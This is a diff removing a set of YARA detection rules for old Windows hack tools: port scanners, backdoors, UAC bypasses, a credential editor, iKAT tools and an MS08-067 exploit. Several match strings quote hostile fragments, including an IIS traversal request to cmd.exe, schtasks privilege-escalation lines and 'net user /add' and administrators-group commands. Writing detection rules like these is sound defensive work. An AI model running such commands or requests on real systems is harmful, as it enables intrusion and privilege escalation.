-		$s3 = "Scan All Possible Ports!"
-	condition:
-		all of them
-}
-
-rule DomainScanV1_0 {
-	meta:
-		description = "Auto-generated rule on file DomainScanV1_0.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "aefcd73b802e1c2bdc9b2ef206a4f24e"
-	strings:
-		$s0 = "dIJMuX$aO-EV"
-		$s1 = "XELUxP\"-\\"
-		$s2 = "KaR\"U'}-M,."
-		$s3 = "V.)\\ZDxpLSav"
-		$s4 = "Decompress error"
-		$s5 = "Can't load library"
-		$s6 = "Can't load function"
-		$s7 = "com0tl32:.d"
-	condition:
-		all of them
-}
-
-rule MooreR_Port_Scanner {
-	meta:
-		description = "Auto-generated rule on file MooreR Port Scanner.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "376304acdd0b0251c8b19fea20bb6f5b"
-	strings:
-		$s0 = "Description|"
-		$s3 = "soft Visual Studio\\VB9yp"
-		$s4 = "adj_fptan?4"
-		$s7 = "DOWS\\SyMem32\\/o"
-	condition:
-		all of them
-}
-
-rule NetBIOS_Name_Scanner {
-	meta:
-		description = "Auto-generated rule on file NetBIOS Name Scanner.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "888ba1d391e14c0a9c829f5a1964ca2c"
-	strings:
-		$s0 = "IconEx"
-		$s2 = "soft Visual Stu"
-		$s4 = "NBTScanner!y&"
-	condition:
-		all of them
-}
-
-rule FeliksPack3___Scanners_ipscan {
-	meta:
-		description = "Auto-generated rule on file ipscan.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "6c1bcf0b1297689c8c4c12cc70996a75"
-	strings:
-		$s2 = "WCAP;}ECTED"
-		$s4 = "NotSupported"
-		$s6 = "SCAN.VERSION{_"
-	condition:
-		all of them
-}
-
-rule CGISscan_CGIScan {
-	meta:
-		description = "Auto-generated rule on file CGIScan.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "338820e4e8e7c943074d5a5bc832458a"
-	strings:
-		$s2 = "WSocketResolveHost: Cannot convert host address '%s'"
-		$s3 = "tcp is the only protocol supported thru socks server"
-		
-		$path1 = /filepath: .{,70}EPO.{,70}\n/
-	condition:
-		$s2 and $s3 and not $path1
-}
-
-rule IP_Stealing_Utilities {
-	meta:
-		description = "Auto-generated rule on file IP Stealing Utilities.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "65646e10fb15a2940a37c5ab9f59c7fc"
-	strings:
-		$s0 = "DarkKnight"
-		$s9 = "IPStealerUtilities"
-	condition:
-		all of them
-}
-
-rule SuperScan4 {
-	meta:
-		description = "Auto-generated rule on file SuperScan4.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "78f76428ede30e555044b83c47bc86f0"
-	strings:
-		$s2 = " td class=\"summO1\">"
-		$s6 = "REM'EBAqRISE"
-		$s7 = "CorExitProcess'msc#e"
-	condition:
-		all of them
-
-}
-rule PortRacer {
-	meta:
-		description = "Auto-generated rule on file PortRacer.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "2834a872a0a8da5b1be5db65dfdef388"
-	strings:
-		$s0 = "Auto Scroll BOTH Text Boxes"
-		$s4 = "Start/Stop Portscanning"
-		$s6 = "Auto Save LogFile by pressing STOP"
-	condition:
-		all of them
-}
-
-rule scanarator {
-	meta:
-		description = "Auto-generated rule on file scanarator.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "848bd5a518e0b6c05bd29aceb8536c46"
-	strings:
-		$s4 = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
-	condition:
-		all of them
-}
-
-rule aolipsniffer {
-	meta:
-		description = "Auto-generated rule on file aolipsniffer.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "51565754ea43d2d57b712d9f0a3e62b8"
-	strings:
-		$s0 = "C:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLB"
-		$s1 = "dwGetAddressForObject"
-		$s2 = "Color Transfer Settings"
-		$s3 = "FX Global Lighting Angle"
-		$s4 = "Version compatibility info"
-		$s5 = "New Windows Thumbnail"
-		$s6 = "Layer ID Generator Base"
-		$s7 = "Color Halftone Settings"
-		$s8 = "C:\\WINDOWS\\SYSTEM\\MSWINSCK.oca"
-	condition:
-		all of them
-}
-
-rule _Bitchin_Threads_ {
-	meta:
-		description = "Auto-generated rule on file =Bitchin Threads=.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "7491b138c1ee5a0d9d141fbfd1f0071b"
-	strings:
-		$s0 = "DarKPaiN"
-		$s1 = "=BITCHIN THREADS"
-	condition:
-		all of them
-}
-
-rule cgis4_cgis4 {
-	meta:
-		description = "Auto-generated rule on file cgis4.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "d658dad1cd759d7f7d67da010e47ca23"
-	strings:
-		$s0 = ")PuMB_syJ"
-		$s1 = "&,fARW>yR"
-		$s2 = "m3hm3t_rullaz"
-		$s3 = "7Projectc1"
-		$s4 = "Ten-GGl\""
-		$s5 = "/Moziqlxa"
-	condition:
-		all of them
-}
-
-rule portscan {
-	meta:
-		description = "Auto-generated rule on file portscan.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "a8bfdb2a925e89a281956b1e3bb32348"
-	strings:
-		$s5 = "0    :SCAN BEGUN ON PORT:"
-		$s6 = "0    :PORTSCAN READY."
-	condition:
-		all of them
-}
-
-rule ProPort_zip_Folder_ProPort {
-	meta:
-		description = "Auto-generated rule on file ProPort.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "c1937a86939d4d12d10fc44b7ab9ab27"
-	strings:
-		$s0 = "Corrupt Data!"
-		$s1 = "K4p~omkIz"
-		$s2 = "DllTrojanScan"
-		$s3 = "GetDllInfo"
-		$s4 = "Compressed by Petite (c)1999 Ian Luck."
-		$s5 = "GetFileCRC32"
-		$s6 = "GetTrojanNumber"
-		$s7 = "TFAKAbout"
-	condition:
-		all of them
-}
-
-rule StealthWasp_s_Basic_PortScanner_v1_2 {
-	meta:
-		description = "Auto-generated rule on file StealthWasp's Basic PortScanner v1.2.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "7c0f2cab134534cd35964fe4c6a1ff00"
-	strings:
-		$s1 = "Basic PortScanner"
-		$s6 = "Now scanning port:"
-	condition:
-		all of them
-}
-
-rule BluesPortScan {
-	meta:
-		description = "Auto-generated rule on file BluesPortScan.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "6292f5fc737511f91af5e35643fc9eef"
-	strings:
-		$s0 = "This program was made by Volker Voss"
-		$s1 = "JiBOo~SSB"
-	condition:
-		all of them
-}
-
-rule scanarator_iis {
-	meta:
-		description = "Auto-generated rule on file iis.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "3a8fc02c62c8dd65e038cc03e5451b6e"
-	strings:
-		$s0 = "example: iis 10.10.10.10"
-		$s1 = "send error"
-	condition:
-		all of them
-}
-
-rule stealth_Stealth {
-	meta:
-		description = "Auto-generated rule on file Stealth.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "8ce3a386ce0eae10fc2ce0177bbc8ffa"
-	strings:
-		$s3 = "<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>"
-		$s6 = "This tool may be used only by system administrators. I am not responsible for "
-	condition:
-		all of them
-}
-
-rule Angry_IP_Scanner_v2_08_ipscan {
-	meta:
-		description = "Auto-generated rule on file ipscan.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "70cf2c09776a29c3e837cb79d291514a"
-	strings:
-		$s0 = "_H/EnumDisplay/"
-		$s5 = "ECTED.MSVCRT0x"
-		$s8 = "NotSupported7"
-	condition:
-		all of them
-}
-
-rule crack_Loader {
-	meta:
-		description = "Auto-generated rule on file Loader.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		hash = "f4f79358a6c600c1f0ba1f7e4879a16d"
-	strings:
-		$s0 = "NeoWait.exe"
-		$s1 = "RRRRRRRW"
-	condition:
-		all of them
-}
-
-rule CN_GUI_Scanner {
-	meta: 
-		description = "Detects an unknown GUI scanner tool - CN background"
-		author = "Florian Roth"
-		hash = "3c67bbb1911cdaef5e675c56145e1112"
-		score = 65
-		date = "04.10.2014"
-	strings:
-		$s1 = "good.txt" fullword ascii
-		$s2 = "IP.txt" fullword ascii
-		$s3 = "xiaoyuer" fullword ascii
-		$s0w = "ssh(" fullword wide
-		$s1w = ").exe" fullword wide
-	condition:
-		all of them
-}	
-
-rule CN_Packed_Scanner {
-	meta: 
-		description = "Suspiciously packed executable"
-		author = "Florian Roth"
-		hash = "6323b51c116a77e3fba98f7bb7ff4ac6"
-		score = 40
-		date = "06.10.2014"
-	strings:
-		$s1 = "kernel32.dll" fullword ascii
-		$s2 = "CRTDLL.DLL" fullword ascii
-		$s3 = "__GetMainArgs" fullword ascii
-		$s4 = "WS2_32.DLL" fullword ascii
-	condition:
-		all of them and filesize < 180KB and filesize > 70KB
-}
-
-rule Tiny_Network_Tool_Generic {
-	meta:
-		description = "Tiny tool with suspicious function imports. (Rule based on WinEggDrop Scanner samples)"
-		author = "Florian Roth"
-		date = "08.10.2014"
-		score = 40
-		type = "file"
-		hash0 = "9e1ab25a937f39ed8b031cd8cfbc4c07"
-		hash1 = "cafc31d39c1e4721af3ba519759884b9"
-		hash2 = "8e635b9a1e5aa5ef84bfa619bd2a1f92"
-	strings:
-		$magic	= { 4d 5a }
-	
-		$s0 = "KERNEL32.DLL" fullword ascii
-		$s1 = "CRTDLL.DLL" fullword ascii
-		$s3 = "LoadLibraryA" fullword ascii
-		$s4 = "GetProcAddress" fullword ascii
-
-		$y1 = "WININET.DLL" fullword ascii
-		$y2 = "atoi" fullword ascii
-		
-		$x1 = "ADVAPI32.DLL" fullword ascii
-		$x2 = "USER32.DLL" fullword ascii
-		$x3 = "wsock32.dll" fullword ascii
-		$x4 = "FreeSid" fullword ascii
-		$x5 = "atoi" fullword ascii
-
-		$z1 = "ADVAPI32.DLL" fullword ascii
-		$z2 = "USER32.DLL" fullword ascii
-		$z3 = "FreeSid" fullword ascii
-		$z4 = "ToAscii" fullword ascii
-		
-	condition:
-		( $magic at 0 ) and all of ($s*) and ( all of ($y*) or all of ($x*) or all of ($z*) ) and filesize < 15KB
-}
-
-rule Beastdoor_Backdoor {
-	meta:
-		description = "Detects the backdoor Beastdoor"
-		author = "Florian Roth"
-		score = 55
-		hash = "5ab10dda548cb821d7c15ebcd0a9f1ec6ef1a14abcc8ad4056944d060c49535a"
-	strings:
-		$s0 = "Redirect SPort RemoteHost RPort  -->Port Redirector" fullword
-		$s1 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword
-		$s2 = "http://IP/a.exe a.exe            -->Download A File" fullword
-		$s7 = "Host: wwp.mirabilis.com:80" fullword
-		$s8 = "%s -Set Port PortNumber              -->Set The Service Port" fullword
-		$s11 = "Shell                            -->Get A Shell" fullword
-		$s14 = "DeleteService ServiceName        -->Delete A Service" fullword
-		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword
-		$s17 = "%s -Set ServiceName ServiceName      -->Set The Service Name" fullword
-	condition:
-		2 of them
-}
-
-rule Powershell_Netcat {
-	meta:
-		description = "Detects a Powershell version of the Netcat network hacking tool"
-		author = "Florian Roth"
-		score = 60
-		date = "10.10.2014"
-	strings:
-		$s0 = "[ValidateRange(1, 65535)]" fullword
-		$s1 = "$Client = New-Object -TypeName System.Net.Sockets.TcpClient" fullword
-		$s2 = "$Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSize" fullword
-	condition:
-		all of them
-}
-
-rule Chinese_Hacktool_1014 {
-	meta:
-		description = "Detects a chinese hacktool with unknown use"
-		author = "Florian Roth"
-		score = 60
-		date = "10.10.2014"
-		hash = "98c07a62f7f0842bcdbf941170f34990"
-	strings:
-		$s0 = "IEXT2_IDC_HORZLINEMOVECURSOR" fullword wide
-		$s1 = "msctls_progress32" fullword wide
-		$s2 = "Reply-To: %s" fullword ascii
-		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
-		$s4 = "html htm htx asp" fullword ascii
-	condition:
-		all of them
-}
-
-rule CN_Hacktool_BAT_PortsOpen {
-	meta:
-		description = "Detects a chinese BAT hacktool for local port evaluation"
-		author = "Florian Roth"
-		score = 60
-		date = "12.10.2014"
-	strings:
-		$s0 = "for /f \"skip=4 tokens=2,5\" %%a in ('netstat -ano -p TCP') do (" ascii
-		$s1 = "in ('tasklist /fi \"PID eq %%b\" /FO CSV') do " ascii
-		$s2 = "@echo off" ascii
-	condition:
-		all of them
-}
-
-rule CN_Hacktool_SSPort_Portscanner {
-	meta:
-		description = "Detects a chinese Portscanner named SSPort"
-		author = "Florian Roth"
-		score = 70
-		date = "12.10.2014"
-	strings:
-		$s0 = "Golden Fox" fullword wide
-		$s1 = "Syn Scan Port" fullword wide
-		$s2 = "CZ88.NET" fullword wide
-	condition:
-		all of them
-}
-
-rule CN_Hacktool_ScanPort_Portscanner {
-	meta:
-		description = "Detects a chinese Portscanner named ScanPort"
-		author = "Florian Roth"
-		score = 70
-		date = "12.10.2014"
-	strings:
-		$s0 = "LScanPort" fullword wide
-		$s1 = "LScanPort Microsoft" fullword wide
-		$s2 = "www.yupsoft.com" fullword wide
-	condition:
-		all of them
-}
-
-rule CN_Hacktool_S_EXE_Portscanner {
-	meta:
-		description = "Detects a chinese Portscanner named s.exe"
-		author = "Florian Roth"
-		score = 70
-		date = "12.10.2014"
-	strings:
-		$s0 = "\\Result.txt" fullword ascii
-		$s1 = "By:ZT QQ:376789051" fullword ascii
-		$s2 = "(http://www.eyuyan.com)" fullword wide
-	condition:
-		all of them
-}
-
-rule CN_Hacktool_MilkT_BAT {
-	meta:
-		description = "Detects a chinese Portscanner named MilkT - shipped BAT"
-		author = "Florian Roth"
-		score = 70
-		date = "12.10.2014"
-	strings:
-		$s0 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii
-		$s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii
-	condition:
-		all of them
-}
-
-rule CN_Hacktool_MilkT_Scanner {
-	meta:
-		description = "Detects a chinese Portscanner named MilkT"
-		author = "Florian Roth"
-		score = 60
-		date = "12.10.2014"
-	strings:
-		$s0 = "Bf **************" ascii fullword
-		$s1 = "forming Time: %d/" ascii
-		$s2 = "KERNEL32.DLL" ascii fullword
-		$s3 = "CRTDLL.DLL" ascii fullword
-		$s4 = "WS2_32.DLL" ascii fullword
-		$s5 = "GetProcAddress" ascii fullword
-		$s6 = "atoi" ascii fullword
-	condition:
-		all of them
-}
-
-rule CN_Hacktool_1433_Scanner {
-	meta:
-		description = "Detects a chinese MSSQL scanner"
-		author = "Florian Roth"
-		score = 40
-		date = "12.10.2014"
-	strings:
-		$magic = { 4d 5a }
-		$s0 = "1433" wide fullword
-		$s1 = "1433V" wide
-		$s2 = "del Weak1.txt" ascii fullword
-		$s3 = "del Attack.txt" ascii fullword
-		$s4 = "del /s /Q C:\\Windows\\system32\\doors\\" fullword ascii
-		$s5 = "!&start iexplore http://www.crsky.com/soft/4818.html)" fullword ascii
-	condition:
-		( $magic at 0 ) and all of ($s*)
-}
-
-rule CN_Hacktool_1433_Scanner_Comp2 {
-	meta:
-		description = "Detects a chinese MSSQL scanner - component 2"
-		author = "Florian Roth"
-		score = 40
-		date = "12.10.2014"
-	strings:
-		$magic = { 4d 5a }
-		$s0 = "1433" wide fullword
-		$s1 = "1433V" wide
-		$s2 = "UUUMUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUMUUU" ascii fullword
-	condition:
-		( $magic at 0 ) and all of ($s*)
-}
-
-rule WCE_Modified_1_1014 {
-	meta:
-		description = "Modified (packed) version of Windows Credential Editor"
-		author = "Florian Roth"
-		hash = "09a412ac3c85cedce2642a19e99d8f903a2e0354"
-		score = 70
-	strings:
-		$s0 = "LSASS.EXE" fullword ascii
-		$s1 = "_CREDS" ascii
-		$s9 = "Using WCE " ascii
-	condition:
-		all of them
-}
-
-rule ReactOS_cmd_valid {
-	meta:
-		description = "ReactOS cmd.exe with correct file name - maybe packed with software or part of hacker toolset"
-		author = "Florian Roth"
-		date = "05.11.14"
-		reference = "http://www.elifulkerson.com/articles/suzy-sells-cmd-shells.php"
-		score = 30
-		hash = "b88f050fa69d85af3ff99af90a157435296cbb6e"
-	strings:
-		$s1 = "ReactOS Command Processor" fullword wide
-		$s2 = "Copyright (C) 1994-1998 Tim Norman and others" fullword wide
-		$s3 = "Eric Kohl and others" fullword wide
-		$s4 = "ReactOS Operating System" fullword wide
-	condition:
-		all of ($s*)
-}
-
-rule iKAT_wmi_rundll {
-	meta:
-		description = "This exe will attempt to use WMI to Call the Win32_Process event to spawn rundll - file wmi_rundll.exe"
-		author = "Florian Roth"
-		date = "05.11.14"
-		score = 65
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		hash = "97c4d4e6a644eed5aa12437805e39213e494d120"
-	strings:
-		$s0 = "This operating system is not supported." fullword ascii
-		$s1 = "Error!" fullword ascii
-		$s2 = "Win32 only!" fullword ascii
-		$s3 = "COMCTL32.dll" fullword ascii
-		$s4 = "[LordPE]" ascii
-		$s5 = "CRTDLL.dll" fullword ascii
-		$s6 = "VBScript" fullword ascii
-		$s7 = "CoUninitialize" fullword ascii
-	condition:
-		all of them and filesize < 15KB
-}
-
-rule iKAT_revelations {
-	meta:
-		description = "iKAT hack tool showing the content of password fields - file revelations.exe"
-		author = "Florian Roth"
-		date = "05.11.14"
-		score = 75
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		hash = "c4e217a8f2a2433297961561c5926cbd522f7996"
-	strings:
-		$s0 = "The RevelationHelper.DLL file is corrupt or missing." fullword ascii
-		$s8 = "BETAsupport@snadboy.com" fullword wide
-		$s9 = "support@snadboy.com" fullword wide
-		$s14 = "RevelationHelper.dll" fullword ascii
-	condition:
-		all of them
-}
-
-rule iKAT_priv_esc_tasksch {
-	meta:
-		description = "Task Schedulder Local Exploit - Windows local priv-esc using Task Scheduler, published by webDevil. Supports Windows 7 and Vista."
-		author = "Florian Roth"
-		date = "05.11.14"
-		score = 75		
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		hash = "84ab94bff7abf10ffe4446ff280f071f9702cf8b"
-	strings:
-		$s0 = "objShell.Run \"schtasks /change /TN wDw00t /disable\",,True" fullword ascii
-		$s3 = "objShell.Run \"schtasks /run /TN wDw00t\",,True" fullword ascii
-		$s4 = "'objShell.Run \"cmd /c copy C:\\windows\\system32\\tasks\\wDw00t .\",,True" fullword ascii
-		$s6 = "a.WriteLine (\"schtasks /delete /f /TN wDw00t\")" fullword ascii
-		$s7 = "a.WriteLine (\"net user /add ikat ikat\")" fullword ascii
-		$s8 = "a.WriteLine (\"cmd.exe\")" fullword ascii
-		$s9 = "strFileName=\"C:\\windows\\system32\\tasks\\wDw00t\"" fullword ascii
-		$s10 = "For n = 1 To (Len (hexXML) - 1) step 2" fullword ascii
-		$s13 = "output.writeline \" Should work on Vista/Win7/2008 x86/x64\"" fullword ascii
-		$s11 = "Set objExecObject = objShell.Exec(\"cmd /c schtasks /query /XML /TN wDw00t\")" fullword ascii
-		$s12 = "objShell.Run \"schtasks /create /TN wDw00t /sc monthly /tr \"\"\"+biatchFile+\"" ascii
-		$s14 = "a.WriteLine (\"net localgroup administrators /add v4l\")" fullword ascii		
-		$s20 = "Set ts = fso.createtextfile (\"wDw00t.xml\")" fullword ascii
-	condition:
-		2 of them
-}
-
-rule iKAT_command_lines_agent {
-	meta:
-		description = "iKAT hack tools set agent - file ikat.exe"
-		author = "Florian Roth"
-		date = "05.11.14"
-		score = 75		
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		hash = "c802ee1e49c0eae2a3fc22d2e82589d857f96d94"
-	strings:
-		$s0 = "Extended Module: super mario brothers" fullword ascii
-		$s1 = "Extended Module: " fullword ascii
-		$s3 = "ofpurenostalgicfeeling" fullword ascii
-		$s8 = "-supermariobrotheretic" fullword ascii
-		$s9 = "!http://132.147.96.202:80" fullword ascii
-		$s12 = "iKAT Exe Template" fullword ascii
-		$s15 = "withadancyflavour.." fullword ascii
-		$s16 = "FastTracker v2.00   " fullword ascii
-	condition:
-		4 of them
-}
-
-rule iKAT_cmd_as_dll {
-	meta:
-		description = "iKAT toolset file cmd.dll ReactOS file cloaked"
-		author = "Florian Roth"
-		date = "05.11.14"
-		score = 65
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		hash = "b5d0ba941efbc3b5c97fe70f70c14b2050b8336a"
-	strings:
-		$s1 = "cmd.exe" fullword wide
-		$s2 = "ReactOS Development Team" fullword wide
-		$s3 = "ReactOS Command Processor" fullword wide
-		
-		$ext = "extension: .dll" nocase
-	condition:
-		all of ($s*) and $ext 
-}
-
-rule iKAT_tools_nmap {
-	meta:
-		description = "Generic rule for NMAP - based on NMAP 4 standalone"
-		author = "Florian Roth"
-		date = "05.11.14"
-		score = 50
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		hash = "d0543f365df61e6ebb5e345943577cc40fca8682"
-	strings:
-		$s0 = "Insecure.Org" fullword wide
-		$s1 = "Copyright (c) Insecure.Com" fullword wide
-		$s2 = "nmap" fullword nocase
-		$s3 = "Are you alert enough to be using Nmap?  Have some coffee or Jolt(tm)." ascii
-	condition:
-		all of them
-}
-
-rule iKAT_startbar {
-	meta:
-		description = "Tool to hide unhide the windows startbar from command line - iKAT hack tools - file startbar.exe"
-		author = "Florian Roth"
-		date = "05.11.14"
-		score = 50
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		hash = "0cac59b80b5427a8780168e1b85c540efffaf74f"
-	strings:
-		$s2 = "Shinysoft Limited1" fullword ascii
-		$s3 = "Shinysoft Limited0" fullword ascii
-		$s4 = "Wellington1" fullword ascii
-		$s6 = "Wainuiomata1" fullword ascii
-		$s8 = "56 Wright St1" fullword ascii
-		$s9 = "UTN-USERFirst-Object" fullword ascii
-		$s10 = "New Zealand1" fullword ascii
-	condition:
-		all of them
-}
-
-rule iKAT_gpdisable_customcmd_kitrap0d_uacpoc {
-	meta:
-		description = "iKAT hack tool set generic rule - from files gpdisable.exe, customcmd.exe, kitrap0d.exe, uacpoc.exe"
-		author = "Florian Roth"
-		date = "05.11.14"
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		super_rule = 1
-		hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
-		hash1 = "2725690954c2ad61f5443eb9eec5bd16ab320014"
-		hash2 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
-		hash3 = "b65a460d015fd94830d55e8eeaf6222321e12349"
-		score = 20
-	strings:
-		$s0 = "Failed to get temp file for source AES decryption" fullword
-		$s5 = "Failed to get encryption header for pwd-protect" fullword
-		$s17 = "Failed to get filetime" fullword
-		$s20 = "Failed to delete temp file for password decoding (3)" fullword
-	condition:
-		all of them
-}
-
-rule iKAT_Tool_Generic {
-	meta:
-		description = "Generic Rule for hack tool iKAT files gpdisable.exe, kitrap0d.exe, uacpoc.exe"
-		author = "Florian Roth"
-		date = "05.11.14"
-		score = 55
-		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"
-		super_rule = 1
-		hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f"
-		hash1 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9"
-		hash2 = "b65a460d015fd94830d55e8eeaf6222321e12349"
-	strings:
-		$s0 = "<IconFile>C:\\WINDOWS\\App.ico</IconFile>" fullword
-		$s1 = "Failed to read the entire file" fullword
-		$s4 = "<VersionCreatedBy>14.4.0</VersionCreatedBy>" fullword
-		$s8 = "<ProgressCaption>Run &quot;executor.bat&quot; once the shell has spawned.</P"
-		$s9 = "Running Zip pipeline..." fullword
-		$s10 = "<FinTitle />" fullword
-		$s12 = "<AutoTemp>0</AutoTemp>" fullword
-		$s14 = "<DefaultDir>%TEMP%</DefaultDir>" fullword
-		$s15 = "AES Encrypting..." fullword
-		$s20 = "<UnzipDir>%TEMP%</UnzipDir>" fullword
-	condition:
-		all of them
-}
-
-rule BypassUac2 {
-	meta:
-		description = "Auto-generated rule - file BypassUac2.zip"
-		author = "yarGen Yara Rule Generator"
-		hash = "ef3e7dd2d1384ecec1a37254303959a43695df61"
-	strings:
-		$s0 = "/BypassUac/BypassUac/BypassUac_Utils.cpp" fullword ascii
-		$s1 = "/BypassUac/BypassUacDll/BypassUacDll.aps" fullword ascii
-		$s3 = "/BypassUac/BypassUac/BypassUac.ico" fullword ascii
-	condition:
-		all of them
-}
-
-rule BypassUac_3 {
-	meta:
-		description = "Auto-generated rule - file BypassUacDll.dll"
-		author = "yarGen Yara Rule Generator"
-		hash = "1974aacd0ed987119999735cad8413031115ce35"
-	strings:
-		$s0 = "BypassUacDLL.dll" fullword wide
-		$s1 = "\\Release\\BypassUacDll" ascii
-		$s3 = "Win7ElevateDLL" fullword wide
-		$s7 = "BypassUacDLL" fullword wide
-	condition:
-		3 of them
-}
-
-rule BypassUac_9 {
-	meta:
-		description = "Auto-generated rule - file BypassUac.zip"
-		author = "yarGen Yara Rule Generator"
-		hash = "93c2375b2e4f75fc780553600fbdfd3cb344e69d"
-	strings:
-		$s0 = "/x86/BypassUac.exe" fullword ascii
-		$s1 = "/x64/BypassUac.exe" fullword ascii
-		$s2 = "/x86/BypassUacDll.dll" fullword ascii
-		$s3 = "/x64/BypassUacDll.dll" fullword ascii
-		$s15 = "BypassUac" fullword ascii
-	condition:
-		all of them
-}
-
-rule BypassUacDll_6 {
-	meta:
-		description = "Auto-generated rule - file BypassUacDll.aps"
-		author = "yarGen Yara Rule Generator"
-		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
-	strings:
-		$s3 = "BypassUacDLL.dll" fullword wide
-		$s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii
-	condition:
-		all of them
-}
-
-rule BypassUacDll_7 {
-	meta:
-		description = "Auto-generated rule - file BypassUacDll.aps"
-		author = "yarGen Yara Rule Generator"
-		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
-	strings:
-		$s3 = "BypassUacDLL.dll" fullword wide
-		$s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii
-	condition:
-		all of them
-}
-
-rule BypassUac_EXE {
-	meta:
-		description = "Auto-generated rule - file BypassUacDll.aps"
-		author = "yarGen Yara Rule Generator"
-		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"
-	strings:
-		$s1 = "Wole32.dll" wide
-		$s3 = "System32\\migwiz" wide
-		$s4 = "System32\\migwiz\\CRYPTBASE.dll" wide
-		$s5 = "Elevation:Administrator!new:" wide
-		$s6 = "BypassUac" wide
-	condition:
-		all of them
-}
-
-rule APT_Proxy_Malware_Packed_dev
-{
-	meta:
-		author = "FRoth"
-		date = "2014-11-10"
-		description = "APT Malware - Proxy"
-		hash = "6b6a86ceeab64a6cb273debfa82aec58"
-		score = 50
-	strings:
-		$string0 = "PECompact2" fullword
-		$string1 = "[LordPE]"
-		$string2 = "steam_ker.dll"
-	condition:
-		all of them
-}
-
-rule Tzddos_DDoS_Tool_CN {
-	meta:
-		description = "Disclosed hacktool set - file tzddos"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "d4c517eda5458247edae59309453e0ae7d812f8e"
-	strings:
-		$s0 = "for /f %%a in (host.txt) do (" fullword ascii
-		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
-		$s2 = "del host.txt /q" fullword ascii
-		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
-		$s4 = "start Http.exe %%a %http%" fullword ascii
-		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
-		$s6 = "del Result.txt s2.txt s1.txt " fullword ascii
-	condition:
-		all of them
-}
-
-rule Ncat_Hacktools_CN {
-	meta:
-		description = "Disclosed hacktool set - file nc.exe"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "001c0c01c96fa56216159f83f6f298755366e528"
-	strings:
-		$s0 = "nc -l -p port [options] [hostname] [port]" fullword ascii
-		$s2 = "nc [-options] hostname port[s] [ports] ... " fullword ascii
-		$s3 = "gethostpoop fuxored" fullword ascii
-		$s6 = "VERNOTSUPPORTED" fullword ascii
-		$s7 = "%s [%s] %d (%s)" fullword ascii
-		$s12 = " `--%s' doesn't allow an argument" fullword ascii
-	condition:
-		all of them
-}
-
-rule MS08_067_Exploit_Hacktools_CN {
-	meta:
-		description = "Disclosed hacktool set - file cs.exe"
-		author = "Florian Roth"
-		date = "17.11.14"
-		score = 60
-		hash = "a3e9e0655447494253a1a60dbc763d9661181322"
-	strings:
-		$s0 = "MS08-067 Exploit for CN by EMM@ph4nt0m.org" fullword ascii
-		$s3 = "Make SMB Connection error:%d" fullword ascii
-		$s5 = "Send Payload Over!" fullword ascii
-		$s7 = "Maybe Patched!" fullword ascii
-		$s8 = "RpcExceptionCode() = %u" fullword ascii
-		$s11 = "ph4nt0m" fullword wide
-		$s12 = "\\\\%s\\IPC$" fullword ascii
-	condition:
-		4 of them
-}
-
